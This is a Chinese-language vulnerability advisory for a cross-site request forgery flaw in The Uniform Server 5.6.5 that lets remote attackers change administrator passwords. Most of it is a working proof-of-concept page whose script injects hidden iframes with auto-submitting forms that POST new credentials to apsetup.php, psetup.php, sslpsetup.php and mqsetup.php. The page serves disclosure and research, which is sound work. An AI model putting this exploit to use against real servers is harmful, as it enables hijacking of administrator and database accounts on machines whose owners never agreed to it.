受影响系统:
Uniform Server Development Team The Uniform Server 5.6.5
描述:
The Uniform Server是一个可以运行在任何的基于Windows操作系统上的WAMP软件包。
The Uniform Server没有执行有效性检查便允许用户通过HTTP请求执行某些操作,远程攻击者可以通过向apsetup.php、psetup.php、sslpsetup.php、mqsetup.php等脚本POST请求执行跨站请求伪造攻击,更改管理员口令。
<*来源:John Leitch
链接:http://secunia.com/advisories/39913
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<script type="text/javascript">
window.onload = function() {
var url = ‘http://localhost/apanel’;
var xsrs = [
{
"action": url + "/apsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "apuser", "value": "new_username" },
{ "name": "appass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/psetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/sslpsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/mqsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "qpass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
}
];
for (var x = 0; x < xsrs.length; x++) {
var attackFrame = document.createElement(‘iframe’);
var html = ‘<html><body><form action="’ + xsrs[x].action + ‘" ‘ +
‘method="’ + xsrs[x].method + ‘">’;
for (var y = 0; y < xsrs[x].fields.length; y++) {
html += ‘<input type="’ +
(xsrs[x].fields[y].type != null ?
xsrs[x].fields[y].type : ‘hidden’) + ‘" ‘ +
‘name="’ + xsrs[x].fields[y].name + ‘" ‘ +
‘value="’ + xsrs[x].fields[y].value + ‘" />’;
}
html += ‘</form><script>’ + xsrs[x].submitCall + ‘\x3c/script></body></html>’;
document.body.appendChild(attackFrame);
attackFrame.contentDocument.write(html);
}
}
</script>
</head>
<body>
</body>
</html>
建议:
厂商补丁:
Uniform Server Development Team
——————————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。